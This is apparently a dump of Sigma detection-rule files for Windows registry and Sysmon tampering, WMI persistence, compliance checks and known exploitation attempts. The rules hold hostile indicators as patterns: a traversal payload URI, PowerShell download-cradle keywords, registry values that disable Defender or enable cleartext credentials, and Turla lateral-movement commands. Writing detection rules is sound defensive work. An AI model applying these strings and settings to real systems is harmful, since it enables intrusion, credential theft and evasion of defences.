    "content": "title: Execution DLL of Choice Using WAB.EXE\nid: fc014922-5def-4da9-a0fc-28c973f41bfb\nstatus: test\ndescription: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml\n    - https://twitter.com/Hexacorn/status/991447379864932352\n    - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-13\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\WAB\\DLLPath'\n    filter:\n        Details: '%CommonProgramFiles%\\System\\wab32.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml",
    "content": "title: Wdigest Enable UseLogonCredential\nid: d6a9b252-c666-4de6-8806-5561bbbd3bdc\nstatus: test\ndescription: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html\n    - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649\n    - https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-09-12\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'WDigest\\UseLogonCredential'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml",
    "content": "title: Disable Windows Defender Functionalities Via Registry Keys\nid: 0eb46774-f1ab-4a74-8238-1155855f2263\nrelated:\n    - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4\n      type: obsolete\n    - id: fd115e64-97c7-491f-951c-fc8da7e042fa\n      type: obsolete\nstatus: test\ndescription: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry\nreferences:\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\n    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\n    - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\n    - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\n    - https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/\nauthor: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel\ndate: 2022-08-01\nmodified: 2024-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows Defender\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\'\n    selection_dword_1:\n        TargetObject|endswith:\n            - '\\DisableAntiSpyware'\n            - '\\DisableAntiVirus'\n            - '\\DisableBehaviorMonitoring'\n            - '\\DisableBlockAtFirstSeen'\n            - '\\DisableEnhancedNotifications'\n            - '\\DisableIntrusionPreventionSystem'\n            - '\\DisableIOAVProtection'\n            - '\\DisableOnAccessProtection'\n            - '\\DisableRealtimeMonitoring'\n            - '\\DisableScanOnRealtimeEnable'\n            - '\\DisableScriptScanning'\n        Details: 'DWORD (0x00000001)'\n    selection_dword_0:\n        TargetObject|endswith:\n            - '\\DisallowExploitProtectionOverride'\n            - '\\Features\\TamperProtection'\n            - '\\MpEngine\\MpEnablePus'\n            - '\\PUAProtection'\n            - '\\Signature Update\\ForceUpdateFromMU'\n            - '\\SpyNet\\SpynetReporting'\n            - '\\SpyNet\\SubmitSamplesConsent'\n            - '\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess'\n        Details: 'DWORD (0x00000000)'\n    filter_optional_symantec:\n        Image|startswith: 'C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n        Image|endswith: '\\sepWscSvc64.exe'\n    condition: selection_main and 1 of selection_dword_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator actions via the Windows Defender interface\n    - Third party Antivirus\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml",
    "content": "title: Winget Admin Settings Modification\nid: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236\nstatus: test\ndescription: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\n    - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        Image|endswith: '\\winget.exe'\n        TargetObject|startswith: '\\REGISTRY\\A\\'\n        TargetObject|endswith: '\\LocalState\\admin_settings'\n    condition: selection\nfalsepositives:\n    - The event doesn't contain information about the type of change. False positives are expected with legitimate changes\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml",
    "content": "title: Enable Local Manifest Installation With Winget\nid: fa277e82-9b78-42dd-b05c-05555c7b6015\nstatus: test\ndescription: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\AppInstaller\\EnableLocalManifestFiles'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrators or developers might enable this for testing purposes or to install custom private packages\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml",
    "content": "title: Winlogon AllowMultipleTSSessions Enable\nid: f7997770-92c3-4ec9-b112-774c4ef96f96\nstatus: test\ndescription: |\n  Detects when the 'AllowMultipleTSSessions' value is enabled.\n  Which allows for multiple Remote Desktop connection sessions to be opened at once.\n  This is often used by attacker as a way to connect to an RDP session without disconnecting the other users\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions'\n        Details|endswith: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Legitimate use of the multi session functionality\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml",
    "content": "title: Winlogon Notify Key Logon Persistence\nid: bbf59793-6efb-4fa1-95ca-a7d288e52c88\nstatus: test\ndescription: |\n    Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\n    Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell\nauthor: frack113\ndate: 2021-12-30\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon'\n        Details|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification.yml",
    "content": "title: Sysmon Configuration Change\nid: 8ac03a65-6c84-4116-acad-dc1558ff7a77\nstatus: test\ndescription: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: frack113\ndate: 2022-01-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 16\n    # To avoid FP just add\n    # filter:\n    #      ConfigurationFileHash: 'SHA256=The_Hash_Of_Your_Valid_Config_XML'\n    # condition: selection and not filter\n    condition: selection\nfalsepositives:\n    - Legitimate administrative action\nlevel: medium\nregression_tests_path: regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification_error.yml",
    "content": "title: Sysmon Configuration Error\nid: 815cd91b-7dbc-4247-841a-d7dd1392b0a8\nstatus: test\ndescription: Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nauthor: frack113\ndate: 2021-06-04\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: sysmon_error\ndetection:\n    selection_error:\n        Description|contains:\n            - 'Failed to open service configuration with error'\n            - 'Failed to connect to the driver to update configuration'\n    filter_generic_english:\n        Description|contains|all:\n            - 'Failed to open service configuration with error'\n            - 'Last error: The media is write protected.'\n    filter_by_errorcode:\n        Description|contains:\n            - 'Failed to open service configuration with error 19'\n            - 'Failed to open service configuration with error 93'\n    condition: selection_error and not 1 of filter*\nfalsepositives:\n    - Legitimate administrative action\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification_status.yml",
    "content": "title: Sysmon Configuration Modification\nid: 1f2b5353-573f-4880-8e33-7d04dcf97744\nstatus: test\ndescription: Detects when an attacker tries to hide from Sysmon by disabling or stopping it\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nauthor: frack113\ndate: 2021-06-04\nmodified: 2022-08-02\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: sysmon_status\ndetection:\n    selection_stop:\n        State: Stopped\n    selection_conf:\n        - 'Sysmon config state changed'\n    filter:\n        State: Started\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Legitimate administrative action\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_block_executable.yml",
    "content": "title: Sysmon Blocked Executable\nid: 23b71bc5-953e-4971-be4c-c896cda73fc2\nstatus: test\ndescription: Triggers on any Sysmon \"FileBlockExecutable\" event, which indicates a violation of the configured block policy\nreferences:\n    - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-16\nmodified: 2023-09-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 27  # this is fine, we want to match any FileBlockExecutable event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_block_shredding.yml",
    "content": "title: Sysmon Blocked File Shredding\nid: c3e5c1b1-45e9-4632-b242-27939c170239\nstatus: test\ndescription: Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: frack113\ndate: 2023-07-20\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 28  # this is fine, we want to match any FileBlockShredding event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_executable_detected.yml",
    "content": "title: Sysmon File Executable Creation Detected\nid: 693a44e9-7f26-4cb6-b787-214867672d3a\nstatus: test\ndescription: Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\n    - https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36\nauthor: frack113\ndate: 2023-07-20\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 29  # this is fine, we want to match any FileExecutableDetected event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_event_subscription.yml",
    "content": "title: WMI Event Subscription\nid: 0f06a3a5-6a09-413f-8743-e6cf35561297\nstatus: test\ndescription: Detects creation of WMI event subscription persistence method\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection:\n        EventID:\n            - 19\n            - 20\n            - 21\n    condition: selection\nfalsepositives:\n    - Exclude legitimate (vetted) use of WMI event subscription in your network\nlevel: medium\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml",
    "content": "title: Suspicious Encoded Scripts in a WMI Consumer\nid: 83844185-1c5b-45bc-bcf3-b5bf3084ca5b\nstatus: test\ndescription: Detects suspicious encoded payloads in WMI Event Consumers\nreferences:\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-01\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1047\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection_destination:\n        Destination|base64offset|contains:\n            - 'WriteProcessMemory'\n            - 'This program cannot be run in DOS mode'\n            - 'This program must be run under Win32'\n    condition: selection_destination\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml",
    "content": "title: Suspicious Scripting in a WMI Consumer\nid: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0\nstatus: test\ndescription: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers\nreferences:\n    - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/\n    - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2019-04-15\nmodified: 2023-09-09\ntags:\n    - attack.execution\n    - attack.t1059.005\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection_destination:\n        - Destination|contains|all:\n              - 'new-object'\n              - 'net.webclient'\n              - '.downloadstring'\n        - Destination|contains|all:\n              - 'new-object'\n              - 'net.webclient'\n              - '.downloadfile'\n        - Destination|contains:\n              - ' iex('\n              - ' -nop '\n              - ' -noprofile '\n              - ' -decode '\n              - ' -enc '\n              - 'WScript.Shell'\n              - 'System.Security.Cryptography.FromBase64Transform'\n    condition: selection_destination\nfalsepositives:\n    - Legitimate administrative scripts\nlevel: high\n"
  },
  {
    "path": "rules-compliance/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-compliance/other/netflow_cleartext_protocols.yml",
    "content": "title: Cleartext Protocol Usage Via Netflow\nid: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f\nstatus: stable\ndescription: |\n  Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\n  Ensure that an encryption is used for all sensitive information in transit.\n  Ensure that an encrypted channels is used for all administrative account access.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2022-11-18\ntags:\n    - attack.credential-access\n    # - CSC4\n    # - CSC4.5\n    # - CSC14\n    # - CSC14.4\n    # - CSC16\n    # - CSC16.5\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.DS-1\n    # - NIST CSF 1.1 PR.DS-2\n    # - ISO 27002-2013 A.9.2.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - ISO 27002-2013 A.8.3.1\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.10.1.1\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\n    # - PCI DSS 3.2 8.8\n    # - PCI DSS 3.2 1.3\n    # - PCI DSS 3.2 1.4\n    # - PCI DSS 3.2 4.3\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\nlogsource:\n    service: netflow\ndetection:\n    selection:\n        destination.port:\n            - 8080\n            - 21\n            - 80\n            - 23\n            - 50000\n            - 1521\n            - 27017\n            - 1433\n            - 11211\n            - 3306\n            - 15672\n            - 5900\n            - 5901\n            - 5902\n            - 5903\n            - 5904\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-compliance/product/qualys/qualys_default_credentials_usage.yml",
    "content": "title: Default Credentials Usage\nid: 1a395cbc-a84a-463a-9086-ed8a70e573c7\nstatus: experimental\ndescription: |\n    Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\n    Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2025-11-01\ntags:\n    - attack.initial-access\n    # - CSC4\n    # - CSC4.2\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\nlogsource:\n    product: qualys\ndetection:\n    selection:\n        host.scan.vuln:\n            - 10693\n            - 11507\n            - 11633\n            - 11804\n            - 11821\n            - 11847\n            - 11867\n            - 11931\n            - 11935\n            - 11950\n            - 12541\n            - 12558\n            - 12559\n            - 12560\n            - 12562\n            - 12563\n            - 12565\n            - 12587\n            - 12590\n            - 12599\n            - 12702\n            - 12705\n            - 12706\n            - 12907\n            - 12928\n            - 12929\n            - 13053\n            - 13178\n            - 13200\n            - 13218\n            - 13241\n            - 13253\n            - 13274\n            - 13296\n            - 13301\n            - 13327\n            - 13373\n            - 13374\n            - 13409\n            - 13530\n            - 13532\n            - 20065\n            - 20073\n            - 20081\n            - 27202\n            - 27358\n            - 38702\n            - 38719\n            - 42045\n            - 42417\n            - 43029\n            - 43220\n            - 43221\n            - 43222\n            - 43223\n            - 43225\n            - 43246\n            - 43431\n            - 43484\n            - 86857\n            - 87098\n            - 87106\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-compliance/product/qualys/qualys_host_without_firewall.yml",
    "content": "title: Host Without Firewall\nid: 6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9\nstatus: experimental\ndescription: Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-19\nmodified: 2025-11-01\n# tags:\n    # - CSC9\n    # - CSC9.4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 DE.AE-1\n    # - ISO 27002-2013 A.9.1.2\n    # - ISO 27002-2013 A.13.2.1\n    # - ISO 27002-2013 A.13.2.2\n    # - ISO 27002-2013 A.14.1.2\n    # - PCI DSS 3.2 1.4\nlogsource:\n    product: qualys\ndetection:\n    selection:\n        event.category: 'Security Policy'\n        host.scan.vuln_name|contains: 'Firewall Product Not Detected'\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules-dfir/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-emerging-threats/2010/Exploits/CVE-2010-5278/web_cve_2010_5278_exploitation_attempt.yml",
    "content": "title: CVE-2010-5278 Exploitation Attempt\nid: a4a899e8-fd7a-49dd-b5a8-7044def72d61\nstatus: test\ndescription: |\n  MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\n  when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates\nauthor: Subhash Popuri (@pbssubhash)\ndate: 2021-08-25\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2010-5278\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00\n    condition: selection\nfalsepositives:\n    - Scanning from Nuclei\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/Exploits/CVE-2014-6287/web_cve_2014_6287_hfs_rce.yml",
    "content": "title: Rejetto HTTP File Server RCE\nid: a133193c-2daa-4a29-8022-018695fcf0ae\nstatus: test\ndescription: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287\nreferences:\n    - https://vk9-sec.com/hfs-code-execution-cve-2014-6287/\n    - https://www.exploit-db.com/exploits/39161\n    - https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1505.003\n    - cve.2014-6287\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_search:\n        cs-uri-query|contains: '?search=%00{.'\n    selection_payload:\n        cs-uri-query|contains:\n            - 'save|' # Indication of saving a file which shouldn't be tested by vuln scanners\n            - 'powershell'\n            - 'cmd.exe'\n            - 'cmd /c'\n            - 'cmd /r'\n            - 'cmd /k'\n            - 'cscript'\n            - 'wscript'\n            - 'python'\n            - 'C:\\Users\\Public\\'\n            - '%comspec%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml",
    "content": "title: ZxShell Malware\nid: f0b70adb-0075-43b0-9745-e82a1c608fcc\nstatus: test\ndescription: Detects a ZxShell start by the called and well-known function name\nreferences:\n    - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100\n    - https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2017-07-20\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.s0412\n    - attack.g0001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'zxFunction'\n            - 'RemoteDiskXXXXX'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml",
    "content": "title: Turla Group Lateral Movement\nid: c601f20d-570a-4cde-a7d6-e17f99cb8e7f\nstatus: test\ndescription: Detects automated lateral movement by Turla group\nreferences:\n    - https://securelist.com/the-epic-turla-operation/65545/\nauthor: Markus Neis\ndate: 2017-11-07\nmodified: 2022-10-09\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1059\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.discovery\n    - attack.t1083\n    - attack.t1135\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'net use \\\\\\\\%DomainController%\\C$ \"P@ssw0rd\" *'\n            - 'dir c:\\\\*.doc* /s'\n            - 'dir %TEMP%\\\\*.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml",
